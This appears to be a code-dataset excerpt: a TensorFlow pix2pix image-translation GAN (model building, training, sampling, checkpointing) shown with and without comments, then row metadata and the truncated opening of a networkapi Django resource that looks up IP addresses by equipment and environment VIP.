sample_dir, epoch, idx): sample_images = self.load_random_samples() samples, d_loss, g_loss = self.sess.run( [self.fake_B_sample, self.d_loss, self.g_loss], feed_dict={self.real_data: sample_images} ) save_images(samples, [self.batch_size, 1], './{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx)) print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss)) def train(self, args): """Train pix2pix""" d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.d_loss, var_list=self.d_vars) g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.g_loss, var_list=self.g_vars) init_op = tf.global_variables_initializer() self.sess.run(init_op) self.g_sum = tf.summary.merge([self.d__sum, self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum]) self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum]) self.writer = tf.summary.FileWriter("./logs", self.sess.graph) counter = 1 start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for epoch in xrange(args.epoch): data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name)) #np.random.shuffle(data) batch_idxs = min(len(data), args.train_size) // self.batch_size for idx in xrange(0, batch_idxs): batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size] batch = [load_data(batch_file) for batch_file in batch_files] if (self.is_grayscale): batch_images = np.array(batch).astype(np.float32)[:, :, :, None] else: batch_images = np.array(batch).astype(np.float32) # Update D network _, summary_str = self.sess.run([d_optim, self.d_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) # Update G network _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) # Run g_optim twice to make sure that d_loss does not go to zero (different from paper) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) errD_fake = self.d_loss_fake.eval({self.real_data: batch_images}) errD_real = self.d_loss_real.eval({self.real_data: batch_images}) errG = self.g_loss.eval({self.real_data: batch_images}) counter += 1 print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \ % (epoch, idx, batch_idxs, time.time() - start_time, errD_fake+errD_real, errG)) if np.mod(counter, 100) == 1: self.sample_model(args.sample_dir, epoch, idx) if np.mod(counter, 500) == 2: self.save(args.checkpoint_dir, counter) def discriminator(self, image, y=None, reuse=False): with tf.variable_scope("discriminator") as scope: # image is 256 x 256 x (input_c_dim + output_c_dim) if reuse: tf.get_variable_scope().reuse_variables() else: assert tf.get_variable_scope().reuse == False h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv')) # h0 is (128 x 128 x self.df_dim) h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'))) # h1 is (64 x 64 x self.df_dim*2) h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'))) # h2 is (32x 32 x self.df_dim*4) h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv'))) # h3 is (16 x 16 x self.df_dim*8) h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin') return tf.nn.sigmoid(h4), h4 def generator(self, image, y=None): with tf.variable_scope("generator") as scope: s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) # image is (256 x 256 x input_c_dim) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') # e1 is (128 x 128 x self.gf_dim) e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) # e2 is (64 x 64 x self.gf_dim*2) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) # e3 is (32 x 32 x self.gf_dim*4) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) # e4 is (16 x 16 x self.gf_dim*8) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) # e5 is (8 x 8 x self.gf_dim*8) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) # e6 is (4 x 4 x self.gf_dim*8) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) # e7 is (2 x 2 x self.gf_dim*8) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) # e8 is (1 x 1 x self.gf_dim*8) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) # d1 is (2 x 2 x self.gf_dim*8*2) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) # d2 is (4 x 4 x self.gf_dim*8*2) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) # d3 is (8 x 8 x self.gf_dim*8*2) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) # d4 is (16 x 16 x self.gf_dim*8*2) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) # d5 is (32 x 32 x self.gf_dim*4*2) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) # d6 is (64 x 64 x self.gf_dim*2*2) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) # d7 is (128 x 128 x self.gf_dim*1*2) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) # d8 is (256 x 256 x output_c_dim) return tf.nn.tanh(self.d8) def sampler(self, image, y=None): with tf.variable_scope("generator") as scope: scope.reuse_variables() s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) # image is (256 x 256 x input_c_dim) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') # e1 is (128 x 128 x self.gf_dim) e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) # e2 is (64 x 64 x self.gf_dim*2) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) # e3 is (32 x 32 x self.gf_dim*4) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) # e4 is (16 x 16 x self.gf_dim*8) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) # e5 is (8 x 8 x self.gf_dim*8) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) # e6 is (4 x 4 x self.gf_dim*8) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) # e7 is (2 x 2 x self.gf_dim*8) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) # e8 is (1 x 1 x self.gf_dim*8) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) # d1 is (2 x 2 x self.gf_dim*8*2) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) # d2 is (4 x 4 x self.gf_dim*8*2) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) # d3 is (8 x 8 x self.gf_dim*8*2) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) # d4 is (16 x 16 x self.gf_dim*8*2) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) # d5 is (32 x 32 x self.gf_dim*4*2) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) # d6 is (64 x 64 x self.gf_dim*2*2) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) # d7 is (128 x 128 x self.gf_dim*1*2) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) # d8 is (256 x 256 x output_c_dim) return tf.nn.tanh(self.d8) def save(self, checkpoint_dir, step): model_name = "pix2pix.model" model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(self.sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, checkpoint_dir): print(" [*] Reading checkpoint...") model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name)) return True else: return False def test(self, args): """Test pix2pix""" init_op = tf.global_variables_initializer() self.sess.run(init_op) sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)) # sort testing input n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)] sample_files = [x for (y, x) in sorted(zip(n, sample_files))] # load testing input print("Loading testing images ...") sample = [load_data(sample_file, is_test=True) for sample_file in sample_files] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) sample_images = [sample_images[i:i+self.batch_size] for i in xrange(0, len(sample_images), self.batch_size)] sample_images = np.array(sample_images) print(sample_images.shape) start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for i, sample_image in enumerate(sample_images): idx = i+1 print("sampling image ", idx) samples = self.sess.run( self.fake_B_sample, feed_dict={self.real_data: sample_image} ) save_images(samples, [self.batch_size, 1], './{}/test_{:04d}.png'.format(args.test_dir, idx))
44.981481
136
0.572715
from __future__ import division import os import time from glob import glob import tensorflow as tf import numpy as np from six.moves import xrange from ops import * from utils import * class pix2pix(object): def __init__(self, sess, image_size=256, batch_size=1, sample_size=1, output_size=256, gf_dim=64, df_dim=64, L1_lambda=100, input_c_dim=3, output_c_dim=3, dataset_name='facades', checkpoint_dir=None, sample_dir=None): self.sess = sess self.is_grayscale = (input_c_dim == 1) self.batch_size = batch_size self.image_size = image_size self.sample_size = sample_size self.output_size = output_size self.gf_dim = gf_dim self.df_dim = df_dim self.input_c_dim = input_c_dim self.output_c_dim = output_c_dim self.L1_lambda = L1_lambda self.d_bn1 = batch_norm(name='d_bn1') self.d_bn2 = batch_norm(name='d_bn2') self.d_bn3 = batch_norm(name='d_bn3') self.g_bn_e2 = batch_norm(name='g_bn_e2') self.g_bn_e3 = batch_norm(name='g_bn_e3') self.g_bn_e4 = batch_norm(name='g_bn_e4') self.g_bn_e5 = batch_norm(name='g_bn_e5') self.g_bn_e6 = batch_norm(name='g_bn_e6') self.g_bn_e7 = batch_norm(name='g_bn_e7') self.g_bn_e8 = batch_norm(name='g_bn_e8') self.g_bn_d1 = batch_norm(name='g_bn_d1') self.g_bn_d2 = batch_norm(name='g_bn_d2') self.g_bn_d3 = batch_norm(name='g_bn_d3') self.g_bn_d4 = batch_norm(name='g_bn_d4') self.g_bn_d5 = batch_norm(name='g_bn_d5') self.g_bn_d6 = batch_norm(name='g_bn_d6') self.g_bn_d7 = batch_norm(name='g_bn_d7') self.dataset_name = dataset_name self.checkpoint_dir = checkpoint_dir self.build_model() def build_model(self): self.real_data = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_c_dim + self.output_c_dim], name='real_A_and_B_images') self.real_B = self.real_data[:, :, :, :self.input_c_dim] self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim] self.fake_B = self.generator(self.real_A) self.real_AB = tf.concat([self.real_A, self.real_B], 3) self.fake_AB = tf.concat([self.real_A, self.fake_B], 3) self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False) self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True) self.fake_B_sample = self.sampler(self.real_A) self.d_sum = tf.summary.histogram("d", self.D) self.d__sum = tf.summary.histogram("d_", self.D_) self.fake_B_sum = tf.summary.image("fake_B", self.fake_B) self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D))) self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_))) self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \ + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B)) self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real) self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake) self.d_loss = self.d_loss_real + self.d_loss_fake self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss) self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss) t_vars = tf.trainable_variables() self.d_vars = [var for var in t_vars if 'd_' in var.name] self.g_vars = [var for var in t_vars if 'g_' in var.name] self.saver = tf.train.Saver() def load_random_samples(self): data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size) sample = [load_data(sample_file) for sample_file in data] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) return sample_images def sample_model(self, sample_dir, epoch, idx): sample_images = self.load_random_samples() samples, d_loss, g_loss = self.sess.run( [self.fake_B_sample, self.d_loss, self.g_loss], feed_dict={self.real_data: sample_images} ) save_images(samples, [self.batch_size, 1], './{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx)) print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss)) def train(self, args): d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.d_loss, var_list=self.d_vars) g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \ .minimize(self.g_loss, var_list=self.g_vars) init_op = tf.global_variables_initializer() self.sess.run(init_op) self.g_sum = tf.summary.merge([self.d__sum, self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum]) self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum]) self.writer = tf.summary.FileWriter("./logs", self.sess.graph) counter = 1 start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for epoch in xrange(args.epoch): data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name)) batch_idxs = min(len(data), args.train_size) // self.batch_size for idx in xrange(0, batch_idxs): batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size] batch = [load_data(batch_file) for batch_file in batch_files] if (self.is_grayscale): batch_images = np.array(batch).astype(np.float32)[:, :, :, None] else: batch_images = np.array(batch).astype(np.float32) _, summary_str = self.sess.run([d_optim, self.d_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) _, summary_str = self.sess.run([g_optim, self.g_sum], feed_dict={ self.real_data: batch_images }) self.writer.add_summary(summary_str, counter) errD_fake = self.d_loss_fake.eval({self.real_data: batch_images}) errD_real = self.d_loss_real.eval({self.real_data: batch_images}) errG = self.g_loss.eval({self.real_data: batch_images}) counter += 1 print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \ % (epoch, idx, batch_idxs, time.time() - start_time, errD_fake+errD_real, errG)) if np.mod(counter, 100) == 1: self.sample_model(args.sample_dir, epoch, idx) if np.mod(counter, 500) == 2: self.save(args.checkpoint_dir, counter) def discriminator(self, image, y=None, reuse=False): with tf.variable_scope("discriminator") as scope: if reuse: tf.get_variable_scope().reuse_variables() else: assert tf.get_variable_scope().reuse == False h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv')) h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'))) h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'))) h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv'))) h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin') return tf.nn.sigmoid(h4), h4 def generator(self, image, y=None): with tf.variable_scope("generator") as scope: s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) return tf.nn.tanh(self.d8) def sampler(self, image, y=None): with tf.variable_scope("generator") as scope: scope.reuse_variables() s = self.output_size s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128) e1 = conv2d(image, self.gf_dim, name='g_e1_conv') e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv')) e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv')) e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv')) e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv')) e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv')) e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv')) e8 = self.g_bn_e8(conv2d(lrelu(e7), self.gf_dim*8, name='g_e8_conv')) self.d1, self.d1_w, self.d1_b = deconv2d(tf.nn.relu(e8), [self.batch_size, s128, s128, self.gf_dim*8], name='g_d1', with_w=True) d1 = tf.nn.dropout(self.g_bn_d1(self.d1), 0.5) d1 = tf.concat([d1, e7], 3) self.d2, self.d2_w, self.d2_b = deconv2d(tf.nn.relu(d1), [self.batch_size, s64, s64, self.gf_dim*8], name='g_d2', with_w=True) d2 = tf.nn.dropout(self.g_bn_d2(self.d2), 0.5) d2 = tf.concat([d2, e6], 3) self.d3, self.d3_w, self.d3_b = deconv2d(tf.nn.relu(d2), [self.batch_size, s32, s32, self.gf_dim*8], name='g_d3', with_w=True) d3 = tf.nn.dropout(self.g_bn_d3(self.d3), 0.5) d3 = tf.concat([d3, e5], 3) self.d4, self.d4_w, self.d4_b = deconv2d(tf.nn.relu(d3), [self.batch_size, s16, s16, self.gf_dim*8], name='g_d4', with_w=True) d4 = self.g_bn_d4(self.d4) d4 = tf.concat([d4, e4], 3) self.d5, self.d5_w, self.d5_b = deconv2d(tf.nn.relu(d4), [self.batch_size, s8, s8, self.gf_dim*4], name='g_d5', with_w=True) d5 = self.g_bn_d5(self.d5) d5 = tf.concat([d5, e3], 3) self.d6, self.d6_w, self.d6_b = deconv2d(tf.nn.relu(d5), [self.batch_size, s4, s4, self.gf_dim*2], name='g_d6', with_w=True) d6 = self.g_bn_d6(self.d6) d6 = tf.concat([d6, e2], 3) self.d7, self.d7_w, self.d7_b = deconv2d(tf.nn.relu(d6), [self.batch_size, s2, s2, self.gf_dim], name='g_d7', with_w=True) d7 = self.g_bn_d7(self.d7) d7 = tf.concat([d7, e1], 3) self.d8, self.d8_w, self.d8_b = deconv2d(tf.nn.relu(d7), [self.batch_size, s, s, self.output_c_dim], name='g_d8', with_w=True) return tf.nn.tanh(self.d8) def save(self, checkpoint_dir, step): model_name = "pix2pix.model" model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(self.sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, checkpoint_dir): print(" [*] Reading checkpoint...") model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size) checkpoint_dir = os.path.join(checkpoint_dir, model_dir) ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name)) return True else: return False def test(self, args): init_op = tf.global_variables_initializer() self.sess.run(init_op) sample_files = glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)) n = [int(i) for i in map(lambda x: x.split('/')[-1].split('.jpg')[0], sample_files)] sample_files = [x for (y, x) in sorted(zip(n, sample_files))] print("Loading testing images ...") sample = [load_data(sample_file, is_test=True) for sample_file in sample_files] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) sample_images = [sample_images[i:i+self.batch_size] for i in xrange(0, len(sample_images), self.batch_size)] sample_images = np.array(sample_images) print(sample_images.shape) start_time = time.time() if self.load(self.checkpoint_dir): print(" [*] Load SUCCESS") else: print(" [!] Load failed...") for i, sample_image in enumerate(sample_images): idx = i+1 print("sampling image ", idx) samples = self.sess.run( self.fake_B_sample, feed_dict={self.real_data: sample_image} ) save_images(samples, [self.batch_size, 1], './{}/test_{:04d}.png'.format(args.test_dir, idx))
true
true
f705d70956f36d8ea51f2996a072dc5971196a83
10,385
py
Python
networkapi/ip/resource/IPEquipEvipResource.py
vinicius-marinho/GloboNetworkAPI
94651d3b4dd180769bc40ec966814f3427ccfb5b
[ "Apache-2.0" ]
73
2015-04-13T17:56:11.000Z
2022-03-24T06:13:07.000Z
networkapi/ip/resource/IPEquipEvipResource.py
leopoldomauricio/GloboNetworkAPI
3b5b2e336d9eb53b2c113977bfe466b23a50aa29
[ "Apache-2.0" ]
99
2015-04-03T01:04:46.000Z
2021-10-03T23:24:48.000Z
networkapi/ip/resource/IPEquipEvipResource.py
shildenbrand/GloboNetworkAPI
515d5e961456cee657c08c275faa1b69b7452719
[ "Apache-2.0" ]
64
2015-08-05T21:26:29.000Z
2022-03-22T01:06:28.000Z
# -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from networkapi.admin_permission import AdminPermission from networkapi.ambiente.models import EnvironmentVip from networkapi.auth import has_perm from networkapi.equipamento.models import Equipamento from networkapi.equipamento.models import EquipamentoError from networkapi.equipamento.models import EquipamentoNotFoundError from networkapi.exception import EnvironmentVipNotFoundError from networkapi.exception import InvalidValueError from networkapi.grupo.models import GrupoError from networkapi.infrastructure.xml_utils import dumps_networkapi from networkapi.infrastructure.xml_utils import loads from networkapi.infrastructure.xml_utils import XMLError from networkapi.ip.models import IpError from networkapi.ip.models import IpNotFoundByEquipAndVipError from networkapi.ip.models import NetworkIPv4Error from networkapi.ip.models import NetworkIPv4NotFoundError from networkapi.rest import RestResource from networkapi.rest import UserNotAuthorizedError from networkapi.util import is_valid_int_greater_zero_param from networkapi.util import is_valid_regex from networkapi.util import is_valid_string_maxsize from networkapi.util import is_valid_string_minsize class IPEquipEvipResource(RestResource): log = logging.getLogger('IPEquipEvipResource') def handle_post(self, request, user, *args, **kwargs): """Handles POST requests to get all Ips (v4) or (v6) of equip on Divisao DC and Ambiente Logico of fisrt Network4 and 6 (if exists) of Environment Vip. URL: ip/getbyequipandevip/ """ self.log.info('Get Ips by Equip - Evip') try: # User permission if not has_perm(user, AdminPermission.IPS, AdminPermission.READ_OPERATION): raise UserNotAuthorizedError( None, u'User does not have permission to perform the operation.') # Load XML data xml_map, attrs_map = loads(request.raw_post_data) # XML data format networkapi_map = xml_map.get('networkapi') if networkapi_map is None: msg = u'There is no value to the networkapi tag of XML request.' self.log.error(msg) return self.response_error(3, msg) ip_map = networkapi_map.get('ip_map') if ip_map is None: msg = u'There is no value to the ip tag of XML request.' self.log.error(msg) return self.response_error(3, msg) # Get XML data id_evip = ip_map.get('id_evip') equip_name = ip_map.get('equip_name') # Valid id_evip if not is_valid_int_greater_zero_param(id_evip): self.log.error( u'Parameter id_evip is invalid. Value: %s.', id_evip) raise InvalidValueError(None, 'id_evip', id_evip) # Valid equip_name if not is_valid_string_minsize(equip_name, 3) or not is_valid_string_maxsize(equip_name, 80) or not is_valid_regex(equip_name, '^[A-Z0-9-_]+$'): self.log.error( u'Parameter equip_name is invalid. Value: %s', equip_name) raise InvalidValueError(None, 'equip_name', equip_name) # Business Rules # Get Environment VIp evip = EnvironmentVip.get_by_pk(id_evip) # Get Equipment equip = Equipamento.get_by_name(equip_name) lista_ips_equip = 